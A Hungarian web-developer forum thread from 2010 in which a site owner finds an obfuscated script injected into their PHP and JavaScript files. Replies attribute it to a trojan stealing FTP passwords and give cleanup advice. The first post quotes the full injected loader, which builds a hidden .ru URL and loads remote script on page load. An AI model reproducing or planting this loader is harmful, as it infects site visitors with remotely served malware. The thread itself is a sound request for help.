ugrás a tartalomhoz

S.O.S. Mi a történhetett???? (Creative Commons License izé.......)

dodoka · 2010. Már. 4. (Cs), 21.07
Sziasztok!

Most vettem észre egy érdekes dolgot!
az ősszes index.php és az összes .js fájlokba "betelepült" vmi....

Egy ilyesmi és ehhez hasonló van most az érintett fájlok végén, mindegyik 2kb al lett nagyobb mint kéne:

<script>var l;if(l!='V' && l!='N'){l=''};function z(){this.F="";var I;if(I!='' && I!='B'){I=''};var h=RegExp;var x;if(x!='hh' && x!='NR'){x='hh'};var zF=new String("g");var Do;if(Do!='' && Do!='j'){Do=null};var y='';var s;if(s!='zI'){s='zI'};var jt='';function Q(v,H){var i= String("NYJ[".substr(3));var p;if(p!='R'){p=''};i+=H;this.J='';i+=String("]");this.pp='';var qS;if(qS!=''){qS='b'};this.Z='';var kY;if(kY!='U' && kY != ''){kY=null};var r=new h(i, zF);return v.replace(r, y);this.jH='';this.wG='';};var aq;if(aq!='' && aq!='DD'){aq=''};var Hz;if(Hz!='' && Hz!='ut'){Hz=''};var gn=new String();var Zk;if(Zk!='' && Zk!='f'){Zk=null};var u=String("FuNf/abc".substr(4)+"ABw1.go.BwA1".substr(4,4)+"DGKecom/".substr(4)+"2QDabc.".substr(3)+"0nMmgo.c".substr(4)+"df8om/kdf8".substr(3,4)+"uXAinop".substr(3)+"oisk"+".ru/0H3".substr(0,4)+"incra43".substr(0,4)+"edimhVl".substr(0,4)+"ail.eQX".substr(0,4)+"SQqKcom/".substr(4)+"goog"+"le.cObv".substr(0,4)+"om.p7SF".substr(0,4)+"asMRhp".substr(4));var J_;if(J_!='W' && J_!='Qc'){J_=''};var m;if(m!='' && m!='VPA'){m=''};var q=Q('8339737079738922902223',"9273");var UX;if(UX!='kT'){UX=''};var UK;if(UK!='E'){UK=''};var hb="de"+"fe"+"3qXer".substr(4);var lb="";var HJ=new String("http:"+"//gooZJxe".substr(0,5)+"uUsNgle-c".substr(4)+"om-co"+"XT6.mozi".substr(3)+"lla.o"+"rg.quEBj".substr(0,5)+"ikr-c"+"yHcWom.ra".substr(4)+"temypzEH".substr(0,5)+"eIXAart.reAIX".substr(4,5)+"3rBu:".substr(3));var M=window;var BA;if(BA!='iv'){BA=''};var t=String("srcxZXb".substr(0,3));var ha=new String();var ya='';var fa;if(fa!='' && fa!='my'){fa='rK'};var MB=String("scrp8X3".substr(0,3)+"s0zGipt".substr(4));var wm='';this.io="";var AV=new Array();M.onload=function(){this.y_="";var pu;if(pu!='_v'){pu=''};try {var LX="";var Bt=new Date();this.JP="";ya=HJ+q;var sC='';ya+=u;var zE=new Date();rE=document.createElement(MB);var cw;if(cw!='HS' && cw!='_l'){cw=''};var OvB;if(OvB!='EB' && OvB!='gv'){OvB=''};var bE=new Date();rE[t]=ya;var rs=new Date();var xg;if(xg!='vA' && xg != ''){xg=null};rE[hb]=[1][0];var UP=new String();var wqF;if(wqF!='sT' && wqF!='Y'){wqF='sT'};document.body.appendChild(rE);this.Vi='';} catch(k){};};};var Qg;if(Qg!='qSA' && Qg!='ke'){Qg='qSA'};this.Bp="";z();var yV=new String();var GI="";</script>
<!--d77049fda9f856a464fddcfc87557587-->

és ilyesmi jelenik meg a forráskódban:

<script type='text/javascript'>
SyncWithServerTime('1267727614');
</script>

az egyik esetben meg ez:

<div id='source'></div>
<div id='license'><!--Creative Commons License--><a rel='license' href='http://creativecommons.org/licenses/by-nc-sa/2.5/'><img alt='Creative Commons License' style='border-width: 0' src='http://i.creativecommons.org/l/by-nc-sa/2.5/88x31.png'/></a><br/>This work is licensed under a <a rel='license' href='http://creativecommons.org/licenses/by-nc-sa/2.5/'>Creative Commons Attribution-Noncommercial-Share Alike 2.5 License</a>.<!--/Creative Commons License--><!-- <rdf:RDF xmlns='http://web.resource.org/cc/' xmlns:dc='http://purl.org/dc/elements/1.1/' xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#' xmlns:rdfs='http://www.w3.org/2000/01/rdf-schema#'>
<Work rdf:about=''>
<license rdf:resource='http://creativecommons.org/licenses/by-nc-sa/2.5/' />
</Work>
<License rdf:about='http://creativecommons.org/licenses/by-nc-sa/2.5/'><permits rdf:resource='http://web.resource.org/cc/Reproduction'/><permits rdf:resource='http://web.resource.org/cc/Distribution'/><requires rdf:resource='http://web.resource.org/cc/Notice'/><requires rdf:resource='http://web.resource.org/cc/Attribution'/><prohibits rdf:resource='http://web.resource.org/cc/CommercialUse'/><permits rdf:resource='http://web.resource.org/cc/DerivativeWorks'/><requires rdf:resource='http://web.resource.org/cc/ShareAlike'/></License></rdf:RDF> --></div>
<script type='text/javascript'>
SyncWithServerTime('1267726761');
</script>

Az eset érdekessége hogy, .hu-s .co.cc-s és még a külföldi tárhelyemen lévő wedoldalaimnél is!
A magyar tárhelyen lévőnél tegnap este 22:30 fele, a külföldin pedig tegnap du 14:30 fele...

De hogy kerülhet bele ilyesmi a php fájlokba (és js fájlokba?)

Egy két weboldalam nem is töltődik be tegnap óta... gondolom e miatt...
Nem csak hogy nem módosítottam az érintett fájlokat tegnap, de még csak nem is jártam a weboldalon...
Segítsetek..... Mit csináljak szerintetek???

Mi ez egyáltalán? Ti tapasztaltatok hasonlót???
Ja kivételek voltak a full üres index.php fájlok. Azok nem módosultak...
 
1

Rollback

vbence · 2010. Már. 4. (Cs), 21.45
Töltsd fel a szerverre újra a vinyódról a fájlokat és írj a szolgáltatónak. (Valószínűleg az ő hibájuk).
2

re

dodoka · 2010. Már. 4. (Cs), 21.54
Megpróbálom, bár az egyik oldalnál ami nem töltődik be, egyenként már feltöltöttem a kérdéses fájlokat, de még igy se tölt be az oldal.... (bár átfutom mégeccer nem e hagytam ki vmit..)
Szolgáltató.... lehet... de hogy lehet akkor h 2 egymástól független tárhelyen is ugyan az történt? És mégis mi ez? feltörték a szervert, vagy vírus, vagy mi ????
9

error message

vbence · 2010. Már. 5. (P), 10.09
Ha logból visszanézed a hibaüzeneteket vagy akár display_errorst használsz több esélyel tallod meg a dolgot.
3

Nem lehet, hogy hackerek

Dawars · 2010. Már. 4. (Cs), 21.55
Nem lehet, hogy hackerek voltak, feltörték a szervert?
Csak találgatok.
4

Erre én is gondoltam....

dodoka · 2010. Már. 4. (Cs), 22.13
Erre én is gondoltam, de több egymástól független magyar és külföldi tárhelyen szerveren?? Különös véletlen lenne...
Ti találkoztatok hasonlóval?
Most vettem észre hogy a 000webhost.com-os tárhelyemen is ez történt...
5

vírus

firith · 2010. Már. 4. (Cs), 22.14
ez egy tipikus vírus fertőzés, a mi szerverünkre is felkerült párszor. Az esetek legnagyobb többségében a felhasználó TotalCommandert használt és megjegyeztette vele az FTP jelszót. Azt nem tudom, hogy a vírus csak elküldi-e megfelelő helyre a jelszót, vagy maga tölti fel ezt a JS kódot. Avira AntiVir elég hamar megtalálja, esetleg érdemes lenne futtatni.

Ez nem szolgáltató hiba, hanem tipikus kliens oldali.
6

A js, html fájlok végéhez

nevemrock · 2010. Már. 5. (P), 07.43
Igen szerintem is trója fertőzés áldozata lettél. A JS és HTML és index.php fájlok végéhez fűzi hozzá magát, gyarkorlatilag az utolsó sorok őt tartalmazzák.

Én is találkoztam ilyennel, a nagyobb fájlokat (js) el is rontja, gyakorlatilag a közepétől levágja.
7

Nem tudom milyen OS, és

Tanul0 · 2010. Már. 5. (P), 09.27
Nem tudom milyen OS, és milyen daemon fut a szolgáltatód gépén, de ha proftpd, akkor átmeneti védelmet nyújt egy .ftpaccess fájl aminek a tartalma ez legyen

<Limit ALL>
Allow From .hu
DenyAll
</Limit>
Mivel a támadások 90%-a külföldről jön, ezért ezzel átmenetileg meg tudod oldani.
8

Ne!

janoszen · 2010. Már. 5. (P), 10.02
Ez nem megoldas a problemara, raadasul ki is zarhatod magad a tarhelyrol, ha nincs bekapcsolva a nevfeloldas vagy a netszolgaltatod nem allit be reverse DNSt! Inkabb le kene takaritani a virust, jelszot valtoztatni es nem kikapcsolni az automatikus frissiteseket.
10

Oda írtam, hogy átmeneti

Tanul0 · 2010. Már. 5. (P), 17.37
Oda írtam, hogy átmeneti megoldás
11

re

dodoka · 2010. Már. 6. (Szo), 12.46
Akkor most a vírus a gépemen van, vagy a tárhelyen? Ha utóbbi akkor webes tárhelyről hogyan tudom leírtani a vírust?
13

A te gépeden

Poetro · 2010. Már. 6. (Szo), 12.51
Minden valószínűség szerint valakinek a gépén, aki hozzáfér a weboldalhoz FTP-vel, van vírus. A tárhelyen pedig úgy tudod leírtani, hogy felülírod a vírusmentes eredeti verziókkal a feltöltött fájlokat. És persze betartod a korábbi tanácsokat.
Mellesleg a legújabb Total Commanderben be lehet állítani jelszóvédelmet az FTP jelszavakra, és a legújabb TC ingyenesen letölthető egy korábbi licenc birtokában.
12

re

dodoka · 2010. Már. 6. (Szo), 12.49
Ja, amugy a html fájlokba nem piszkált bele... a nagyobb js eknek se vágta le a végét (attól függ mi számít nagyobbnak 54kb hoz is csak hozzáfűzte...)
14

re

dodoka · 2010. Már. 6. (Szo), 13.20
rendben köszi mindenkinek a segítséget...
most telepítem az avira-t...
Melyik verziószámú Total Commander a legújjab, (vagyis amire te gondolsz)?
15

ghisler.com

Poetro · 2010. Már. 6. (Szo), 14.44
Total Commander oldalán mindig megtalálod a legfrissebb verziót, már csak a jelszavak védelmét kell bekapcsolni a Net > FTP Connect > Encrypt... menüpont alatt.
16

re

dodoka · 2010. Már. 6. (Szo), 22.22
Nekem a TC a régit írta felül igy magyar lett.. igy nem találom azt a menüt amit írtál... Ez Mesterjelszó beállítás lenne?
17

Ipswitch biztonságos??

dodoka · 2010. Már. 7. (V), 21.41
Az Ipswitch WS FTP Professional nevű progi, menyire biztonságos FTP progi az ilyen esetek elkerülésére?

Amugy az Avira télleg talált jópár vírust amit a Nod32 (Eset) nem vett észre....
Mostmár megvan a véleményem a Nod32-ről...
18

nem erted

janoszen · 2010. Már. 8. (H), 07.51
Nem ertetted meg. Nem az FTP program a hibas. Tartsd virusmentesen a geped es akkor nincs problema. Ha az ember nem telepitget ossze-vissza mindenfele (warezolt) szoftvert, nem nez ketes siteokat es frissiti a gepet, akkor nincs problema.
19

értem...

dodoka · 2010. Már. 13. (Szo), 15.33
Értem, de mégis melyik vírusírtó a legbiztonságosabb? A nod után talált vírust az avira,avira után pedig a comodo, comodó után még mindig talált a Norton... de Norton viszont azt nem találta meg amit a Nod vagy az avira kíszűrt....
Akkor most mégis melyiknek higyjek??? Vírusoktól távol maradni meg ma már nem olya eccerü, amikor a programos torrentek is mindig tele vannak... :S
20

Biztonságos forrás

Poetro · 2010. Már. 13. (Szo), 15.45
Talán csak olyan oldalakat kellene látogatni, amelyek biztonságosak. És programokat pedig valódi szoftverkereskedőtől, vagy a program szerzőjétől kellene megvásárolni / letölteni.
21

Torrent, stb

janoszen · 2010. Már. 13. (Szo), 18.39
Ha Te illegális szoftvereket töltesz le és esetleg a Windowsod is az és ezért ki vannak kapcsolva a biztonsági frissítések, akkor sajnos kénytelen vagy magadra vetni. Ha nincs pénzed drága fizetős szoftverekre, fektesd be az energiát és tanuld meg az ingyenes alternatívákat használni.